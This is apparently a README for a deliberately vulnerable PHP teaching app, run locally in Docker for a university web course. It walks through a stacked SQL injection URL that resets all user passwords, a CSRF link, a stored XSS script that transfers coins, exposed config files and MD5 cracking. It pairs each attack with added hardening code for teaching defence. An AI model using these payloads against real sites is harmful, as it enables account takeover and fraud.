- Designed for students of the KIV/WEB course at the University of West Bohemia.
- Install Docker
- Install Docker Compose
- Clone this repository
git clone https://github.com/intraworlds/zcu-security-demo.git
or download the ZIP file
- Run
docker-compose up
and then open the website:
- app: http://localhost:8088/
- username:
willis.ritchie@example.com
- password:
richie
- adminer: http://localhost:8086/?server=mysql&username=admin&db=zcu_demo
- password:
1234
Note: building the Docker containers takes a minute or so the first time, so be patient.
- go to http://localhost:8088/?path=list&limit=50;update%20users%20set%20name=email,password=%27%242y%2410%24vXUP3XG34Nwezd8cEZm0XOLUN5jtDsF6tqpMg.PvFacpzKStHA2ze%27;
- notice the command appended after the `;` in the limit parameter (a stacked query):
update users set name=email,password='$2y$10$vXUP3XG34Nwezd8cEZm0XOLUN5jtDsF6tqpMg.PvFacpzKStHA2ze'
- refresh page
- observe that every user is now named by their email address and their password is
123
(the injected bcrypt hash is the hash of that password)
- so you can now log in to any account and transfer money
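Why the injection works and how to close it, as an added example that is not the demo application's own code. The table and column names, the PDO connection and the DSN are assumptions; the host, database, user and password are taken from the adminer login above.

```php
<?php
// Added example, not code from zcu-security-demo. Assumed schema:
// transactions(id, sender, receiver, amount, description).
declare(strict_types=1);

// Assumed connection; host/db/user/password match the adminer login in the README.
function connect(): PDO
{
    return new PDO('mysql:host=mysql;dbname=zcu_demo;charset=utf8mb4', 'admin', '1234', [
        PDO::ATTR_ERRMODE                => PDO::ERRMODE_EXCEPTION,
        // Real server-side prepares: bound values never become part of the SQL text.
        PDO::ATTR_EMULATE_PREPARES       => false,
        // Defence in depth: refuse stacked statements such as "...;update users set ..."
        PDO::MYSQL_ATTR_MULTI_STATEMENTS => false,
    ]);
}

// VULNERABLE: the raw query parameter is pasted into the SQL text, so
// ?limit=50;update users set name=email,password='...' runs a second statement.
// (Reproduces with PDO's default options, which emulate prepares and allow
// multi-statements; the connect() above deliberately disables both.)
function listTransactionsVulnerable(PDO $pdo, string $limit): array
{
    $sql = "SELECT id, sender, receiver, amount, description
            FROM transactions ORDER BY id DESC LIMIT $limit";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: validate the parameter, bind it as an integer, cap it.
function listTransactionsSafe(PDO $pdo, string $limit): array
{
    if (!ctype_digit($limit)) {
        throw new InvalidArgumentException('limit must be a non-negative integer');
    }
    $n = min((int) $limit, 500);
    $stmt = $pdo->prepare('SELECT id, sender, receiver, amount, description
                           FROM transactions ORDER BY id DESC LIMIT :n');
    $stmt->bindValue(':n', $n, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The payload from the README, URL-decoded.
$payload = '50;update users set name=email,password=\'$2y$10$vXUP3XG34Nwezd8cEZm0XOLUN5jtDsF6tqpMg.PvFacpzKStHA2ze\'';

$pdo = connect();
try {
    listTransactionsSafe($pdo, $payload);   // rejected before any SQL is sent
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
print_r(listTransactionsSafe($pdo, '50'));  // the intended query, and nothing else
```

The validation step matters even with prepared statements: LIMIT takes a number, not a string, so a value that is not all digits is simply wrong input and should be refused rather than coerced. Disabling `MYSQL_ATTR_MULTI_STATEMENTS` is a safety net for any remaining string-built query elsewhere in the code base, not a substitute for binding parameters.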
- goto http://localhost:8088/?path=create&receiver=1&amount=1&desc=❤️&submit=create
- observe that 1 IW coin was transferred to user #1 without your consent
- goto http://localhost:8088/?path=create
- create new transaction with following description
❤️
<script>
fetch("/?path=create&receiver=1&amount=1&desc=❤️&submit=create");
</script>
- observe that now everybody who views the list of transactions sends a coin to user #1 without their consent: the stored script runs in the visitor's browser and the request carries the visitor's session cookie
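How both attacks above are closed, as an added example that is not the demo application's own code: a per-session CSRF token checked in constant time, state changes accepted only over POST, and HTML escaping of the stored description. It assumes the app keeps the logged-in user in a PHP session and that `path=create` is dispatched from one front controller; the handler's return codes are illustrative.

```php
<?php
// Added example, not code from zcu-security-demo. Assumes the logged-in user
// lives in a PHP session and that "create" is dispatched from index.php.
declare(strict_types=1);

// Session cookie: not readable by script, not sent on cross-site subrequests
// (the array form and 'samesite' need PHP 7.3+). 'secure' is false only
// because the demo runs on plain http://localhost. Must precede session_start().
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax', 'secure' => false]);
session_start();

// One random token per session.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a missing or empty token never validates.
function csrfTokenIsValid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $submitted !== null && $expected !== '' && hash_equals($expected, $submitted);
}

// Output escaping: the stored description is rendered as text, so
// "<script>fetch(...)</script>" is displayed literally instead of executed.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The token travels in the POST body, never in the URL.
function renderCreateForm(): string
{
    return '<form method="post" action="/?path=create">'
         . '<input type="hidden" name="csrf_token" value="' . e(csrfToken()) . '">'
         . '<input name="receiver"><input name="amount"><input name="desc">'
         . '<button name="submit" value="create">create</button></form>';
}

function renderTransactionRow(array $tx): string
{
    return '<tr><td>' . e((string) $tx['receiver']) . '</td><td>'
         . e((string) $tx['amount']) . '</td><td>' . e($tx['description']) . '</td></tr>';
}

// Handler for path=create: state changes only via POST and only with a valid token.
// SameSite=Lax still sends the cookie on a top-level GET navigation, which is
// why a GET must never change state. Returns an HTTP status (illustrative).
function handleCreate(string $method, array $post): int
{
    if ($method !== 'POST') {
        return 405;                      // a link, <img> or fetch() GET cannot create
    }
    if (!csrfTokenIsValid($post['csrf_token'] ?? null)) {
        return 403;                      // cross-site POST without the session's token
    }
    // ... validate receiver/amount, then INSERT via a prepared statement ...
    return 201;
}

echo handleCreate('GET',  ['receiver' => 1, 'amount' => 1]), "\n";
echo handleCreate('POST', ['receiver' => 1, 'amount' => 1, 'csrf_token' => 'guess']), "\n";
echo handleCreate('POST', ['receiver' => 1, 'amount' => 1, 'csrf_token' => csrfToken()]), "\n";
echo renderTransactionRow(['receiver' => 1, 'amount' => 1,
    'description' => '<script>fetch("/?path=create&receiver=1&amount=1")</script>']), "\n";
```

The token and the POST-only rule stop the plain cross-site request (the link in the previous step). They do not by themselves stop the stored-script variant: that script runs same-origin in the victim's session, so it could fetch the form and read the token. For that attack the necessary fix is `e()` on every rendered description; the token is then defence in depth.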
Try the following URLs; the web server serves repository files that must never be public:
- http://localhost:8088/docker-compose.yml
- http://localhost:8088/config/app.env
- http://localhost:8088/dumps/zcu_demo.sql
Adjust the Apache configuration (inside the <Directory> block for the document root) to deny everything by default and allow only the file types the application actually serves:
# deny all files by default
<RequireAll>
Require all denied
</RequireAll>
# allow only directory requests (empty filename, e.g. /) and *.php, *.css, *.map, *.js
<FilesMatch "((^$)|(^.+\.(php|css|map|js)$))">
Require all granted
</FilesMatch>
Try cracking the MD5 hash, with hashcat (mode 0, raw MD5) or with the bundled script:
php scripts/crack_md5_hash.php 75b71aa6842e450f12aca00fdf54c51d
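What the cracking script is doing and why unsalted MD5 loses to it, as an added example that is not the repository's scripts/crack_md5_hash.php: a wordlist loop against MD5, next to bcrypt storage via password_hash(), which is the scheme the `$2y$10$` hash injected earlier uses. The wordlist is constructed for the example.

```php
<?php
// Added example, not the repository's scripts/crack_md5_hash.php.
declare(strict_types=1);

// Constructed wordlist standing in for rockyou.txt or similar.
const WORDLIST = ['password', 'letmein', '123', 'richie', 'qwerty'];

// Unsalted MD5: one cheap hash per candidate and no per-user salt, so a
// wordlist attack is a plain loop (hashcat runs the same loop on a GPU).
function crackMd5(string $hash, array $wordlist): ?string
{
    $hash = strtolower(trim($hash));
    if (!preg_match('/^[0-9a-f]{32}$/', $hash)) {
        throw new InvalidArgumentException('not an MD5 hex digest');
    }
    foreach ($wordlist as $candidate) {
        if (hash_equals($hash, md5($candidate))) {
            return $candidate;
        }
    }
    return null;
}

// What to store instead: bcrypt with a cost factor. Every hash carries its own
// random salt, so equal passwords hash differently and each guess must be
// re-hashed per user at the chosen cost.
function storePassword(string $plain): string
{
    return password_hash($plain, PASSWORD_BCRYPT, ['cost' => 12]);
}

function checkPassword(string $plain, string $stored): bool
{
    return password_verify($plain, $stored);
}

// Same loop against bcrypt: correct, but each iteration pays the full cost.
function crackBcrypt(string $stored, array $wordlist): ?string
{
    foreach ($wordlist as $candidate) {
        if (password_verify($candidate, $stored)) {
            return $candidate;
        }
    }
    return null;
}

// 202cb962ac59075b964b07152d234b70 is the MD5 of '123', which the wordlist contains.
var_dump(crackMd5('202cb962ac59075b964b07152d234b70', WORDLIST));

$stored = storePassword('123');
var_dump(strpos($stored, '$2y$12$') === 0);
var_dump(checkPassword('123', $stored));
var_dump(checkPassword('richie', $stored));

$t = microtime(true);
var_dump(crackBcrypt($stored, WORDLIST));
printf("bcrypt wordlist pass took %.2f s for %d guesses\n", microtime(true) - $t, count(WORDLIST));
```

The last lines make the difference tangible: the MD5 loop over the same wordlist finishes in microseconds, while each bcrypt guess costs a full cost-12 computation, and raising the cost is a one-line change that the attacker pays for on every guess.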
Show all running containers
docker-compose ps
See logs
docker-compose logs -f
Open a shell in the Apache container
docker-compose exec apache bash -l
- OWASP SQL Injection
- Soom: SQL Injection (Full Paper) (Czech only)
- PHP triky: Obrana proti SQL Injection (Czech only)
- OWASP CSRF
- Soom (Czech only)
- PHP triky: Cross-Site Request Forgery (Czech only)
- Co je Cross-Site Request Forgery a jak se mu bránit (Czech only)